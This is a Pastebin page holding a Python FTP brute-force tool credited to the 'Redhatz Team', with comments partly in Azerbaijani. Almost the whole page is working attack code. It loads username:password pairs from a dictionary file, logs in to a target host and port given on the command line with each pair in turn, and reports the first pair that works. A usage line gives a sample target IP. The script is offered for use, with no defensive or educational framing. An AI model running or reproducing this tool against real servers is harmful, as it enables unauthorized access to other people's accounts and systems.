Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ##Small FTP Brute-Force tool v 1.0
- ##Copyright 2014 Redhatz Team.
- ##Author:freebyte
- ##Contact me:freebyte@box.az
- ##All rights reserved!
- ##Kicik Ftp Brute Force aleti.Python 3.3.2 versiyasinda hazirlanib.
- ##Python 3.x islekdir.
- ##Compile with cxfreeze(Py332)
- ##Proqram birbasha FTP protokolu uzerinden Remote hosta hucum edir.
- ##FTP Protocol based!
- ##Default dictinary file->./Dictionary.txt
- ##Proqramin icazesiz paylasilmasi qadagandir!
- ##Paylasilma zamani http://www.redhatz.org unvani referrer olaraq gosterilmelidir.
- ##Proqram console rejiminde isleyir.
- ##Help
- ##%scriptname% RHOST RPORT.
- ##Including modules
- from ftplib import FTP,error_perm
- #from threading import Thread
- from sys import argv,exit
- #from colorama import Fore,Back,Style,init
- #init() ##Initializing console text attribute
- Dictionary = 'Dictionary.txt' #Passwords files(username:password)
- Passwords = [] #Empty list object(variable)
- def _parse_Dictionary():
- global Dictionary,Passwords
- fopen = open(Dictionary,'r')
- fread = fopen.read() #read dictionary
- fopen.close() #closing file.faylla isimiz bitdi baglayiriq.
- #parsing data...
- cutnewl = fread.split("\n") #cut \n and cutnewl == type(list)
- #creating for loop (for) generate base passwords
- for j in range(0, len(cutnewl)):
- Passwords.append(cutnewl[j].split(":")) #moved
- ##view var Passwords ([['admin', 'brute'], ['user', 'test'], ['salam', 'sagol'], ['necesen', 'cni']])
- ##list in list
- return (1)
- #read_Dictionary()
- #print(Passwords)
- def b_operation(RHOST, RPORT): #main brute function
- global Passwords
- P = int(RPORT) #if RPORT is string "" convert to integer value
- ##connecting remote
- '''
- >>> for x in range(0, len(a)):
- ... print(a[x][0],a[x][1])
- ...
- admin brute
- user set
- '''
- for q in range(0, len(Passwords)):
- try:
- C = FTP()
- C.connect(RHOST, P)
- C.login(Passwords[q][0], Passwords[q][1])
- C.quit()
- print("positive:[",Passwords[q][0],"] [",Passwords[q][1],"] - ")
- exit(1)
- except (error_perm):
- print("testing:[",Passwords[q][0],"] [",Passwords[q][1],"] + ")
- pass
- _parse_Dictionary() #Loads password in memory
- if argv[1] == "-h":
- print('''\n\nUsage:\nSmall FTP Brute-Force tool v 1.0\nCopyright 2014 Redhatz Team.http://www.redhatz.org\nAuthor:freebyte\nContact me:freebyte@box.az
- "\nAll rights reserved!\n\nSpeeling. RedBrute.exe "192.155.44.33" 21''')
- elif not len(argv) == 3:
- print("Length argument too short. Please add argument")
- else:
- ##print(argv[1],argv[2])
- #patok_1 = Thread(target=b_operation,args= (argv[1],argv[2]))
- #patok_1.start()
- b_operation(argv[1],argv[2])
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement